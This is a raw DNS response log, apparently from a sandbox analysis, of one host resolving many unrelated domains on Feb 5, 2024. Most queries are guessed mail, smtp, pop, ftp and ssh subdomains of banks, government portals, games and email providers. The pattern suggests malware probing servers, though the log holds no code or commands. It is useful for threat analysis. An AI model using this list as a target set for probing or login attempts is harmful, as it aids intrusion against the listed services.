                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115362883 CET1.1.1.1192.168.2.60xf8a6No error (0)sigapbanjarmasin.info35.186.223.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115377903 CET1.1.1.1192.168.2.60x1093No error (0)mobilsam.com178.16.128.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115421057 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115470886 CET1.1.1.1192.168.2.60x13f3No error (0)www2.personas.santander.com.ar200.61.38.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115523100 CET1.1.1.1192.168.2.60xf26cNo error (0)transaccional.saludtotal.com.co190.216.203.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115537882 CET1.1.1.1192.168.2.60x2427No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.273756027 CET1.1.1.1192.168.2.60x1f2bNo error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.285972118 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.285972118 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.286015034 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.41.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.286015034 CET1.1.1.1192.168.2.60xb2d5No error (0)yellosa.co.za172.66.42.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.296701908 CET1.1.1.1192.168.2.60x2ad6No error (0)academico.um.edu.mx201.134.41.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.307890892 CET1.1.1.1192.168.2.60x11deNo error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.307909012 CET1.1.1.1192.168.2.60x11deNo error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315448999 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315546036 CET1.1.1.1192.168.2.60xc850No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.317049026 CET1.1.1.1192.168.2.60x66b9No error (0)s163-es.ogame.gameforge.com79.110.82.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.538316011 CET1.1.1.1192.168.2.60xae6fNo error (0)zoom.us170.114.52.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.539623976 CET1.1.1.1192.168.2.60xbd9eNo error (0)ssc.nic.in164.100.213.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.539638042 CET1.1.1.1192.168.2.60xbd9eNo error (0)ssc.nic.in164.100.213.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.544051886 CET1.1.1.1192.168.2.60x87dcNo error (0)testconnect.garena.com202.81.112.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.550076008 CET1.1.1.1192.168.2.60x88c1No error (0)account.mojang.com20.231.114.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.550815105 CET1.1.1.1192.168.2.60x2d44No error (0)oferta.senasofiaplus.edu.co186.113.7.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.553179026 CET1.1.1.1192.168.2.60x239dNo error (0)analvids.com185.120.71.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.561089039 CET1.1.1.1192.168.2.60x7370Name error (3)mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.568782091 CET1.1.1.1192.168.2.60x2a11No error (0)ov.edesur.com.do179.51.70.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.568782091 CET1.1.1.1192.168.2.60x2a11No error (0)ov.edesur.com.do200.88.115.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.575742960 CET1.1.1.1192.168.2.60x7653No error (0)pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.578013897 CET1.1.1.1192.168.2.60x11dbNo error (0)alt2.gmr-smtp-in.l.google.com108.177.12.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.582779884 CET1.1.1.1192.168.2.60x5fbaNo error (0)loopex.io172.67.148.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.582779884 CET1.1.1.1192.168.2.60x5fbaNo error (0)loopex.io104.21.39.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.651051044 CET1.1.1.1192.168.2.60x61bbNo error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.180.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.189.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com164.90.197.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.130.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.657041073 CET1.1.1.1192.168.2.60x2034No error (0)mx156.hostedmxserver.com147.182.160.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.660273075 CET1.1.1.1192.168.2.60xcb7fNo error (0)mx3.name.com173.192.7.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.661104918 CET1.1.1.1192.168.2.60xfe39No error (0)mail2.casinocontroller.com52.200.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.118927956 CET1.1.1.1192.168.2.60x708dName error (3)mail.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.129008055 CET1.1.1.1192.168.2.60x5c3No error (0)mx.nexters.com54.216.244.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.130435944 CET1.1.1.1192.168.2.60x816eName error (3)mail.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133441925 CET1.1.1.1192.168.2.60x3b03No error (0)terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133441925 CET1.1.1.1192.168.2.60x3b03No error (0)terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195301056 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195317984 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.195332050 CET1.1.1.1192.168.2.60x131dNo error (0)kamgarsetu.mp.gov.in103.94.204.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.196502924 CET1.1.1.1192.168.2.60x3f4dName error (3)smtp.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.208451033 CET1.1.1.1192.168.2.60xa925Name error (3)pop.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.208468914 CET1.1.1.1192.168.2.60x8fe7No error (0)alt1.aspmx.l.google.com172.217.197.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.209479094 CET1.1.1.1192.168.2.60x547aName error (3)mailgate.naukrigulf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.212778091 CET1.1.1.1192.168.2.60xbf68No error (0)relay.opsu.terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.212778091 CET1.1.1.1192.168.2.60xbf68No error (0)relay.opsu.terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.214665890 CET1.1.1.1192.168.2.60x5013No error (0)mail.opsu.terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.214665890 CET1.1.1.1192.168.2.60x5013No error (0)mail.opsu.terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.217096090 CET1.1.1.1192.168.2.60x793No error (0)mx.zoho.com204.141.43.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.222278118 CET1.1.1.1192.168.2.60x3ea8Name error (3)mailgate.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.275041103 CET1.1.1.1192.168.2.60x669eName error (3)mailgate.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.278400898 CET1.1.1.1192.168.2.60xb346No error (0)m.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.278400898 CET1.1.1.1192.168.2.60xb346No error (0)star-mini.c10r.facebook.com31.13.88.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.280081987 CET1.1.1.1192.168.2.60x13e6No error (0)pop.netizion.com45.43.208.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.286684036 CET1.1.1.1192.168.2.60x2872Name error (3)pop3.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.317949057 CET1.1.1.1192.168.2.60xcb0dName error (3)mail.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.322710991 CET1.1.1.1192.168.2.60xecc9Name error (3)mail.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.329864025 CET1.1.1.1192.168.2.60xe433Server failure (2)mail.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.335774899 CET1.1.1.1192.168.2.60x498eName error (3)mail.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.369383097 CET1.1.1.1192.168.2.60xc64fName error (3)mail.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.379020929 CET1.1.1.1192.168.2.60x88f7No error (0)mail.mega.co.nz122.56.56.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.415092945 CET1.1.1.1192.168.2.60x6faNo error (0)mx2.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.424264908 CET1.1.1.1192.168.2.60x498eName error (3)mail.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.424443007 CET1.1.1.1192.168.2.60xcb0dName error (3)mail.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.448195934 CET1.1.1.1192.168.2.60x5a93Name error (3)mail.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.481926918 CET1.1.1.1192.168.2.60x91c6Name error (3)mail.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.498141050 CET1.1.1.1192.168.2.60xd9ebNo error (0)www.minecraft.netwww.minecraft.net-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.508480072 CET1.1.1.1192.168.2.60x922aName error (3)smtp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.524279118 CET1.1.1.1192.168.2.60xc722Server failure (2)mail.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.544905901 CET1.1.1.1192.168.2.60xfb97No error (0)ww1.chainmine.iosedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.544905901 CET1.1.1.1192.168.2.60xfb97No error (0)sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.564585924 CET1.1.1.1192.168.2.60x922aName error (3)smtp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.564637899 CET1.1.1.1192.168.2.60x91c6Name error (3)mail.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)www.analvids.comanalvids.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.695116997 CET1.1.1.1192.168.2.60xf5d2No error (0)mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.429923058 CET1.1.1.1192.168.2.60xf0f8Name error (3)pop.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.430314064 CET1.1.1.1192.168.2.60x473fName error (3)ftp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.430325031 CET1.1.1.1192.168.2.60x7340Name error (3)ftp.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.457437992 CET1.1.1.1192.168.2.60xa4d3Name error (3)mail.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.475892067 CET1.1.1.1192.168.2.60x7d49Name error (3)smtp.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.493398905 CET1.1.1.1192.168.2.60x76daName error (3)pop.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.494349003 CET1.1.1.1192.168.2.60x413eName error (3)mail.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.502909899 CET1.1.1.1192.168.2.60x88aName error (3)ftp.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.519500017 CET1.1.1.1192.168.2.60x17c0Name error (3)ftp.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.525675058 CET1.1.1.1192.168.2.60xf1d3Name error (3)pop.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.533930063 CET1.1.1.1192.168.2.60xc5d3Name error (3)ssh.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.534929037 CET1.1.1.1192.168.2.60x81e6Server failure (2)ssh.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.541579008 CET1.1.1.1192.168.2.60x964Name error (3)mail.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.550721884 CET1.1.1.1192.168.2.60x2851Name error (3)mailgate.store.steampowered.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.551378965 CET1.1.1.1192.168.2.60x8dcaName error (3)mailgate.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.564759016 CET1.1.1.1192.168.2.60x8f49Name error (3)ssh.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
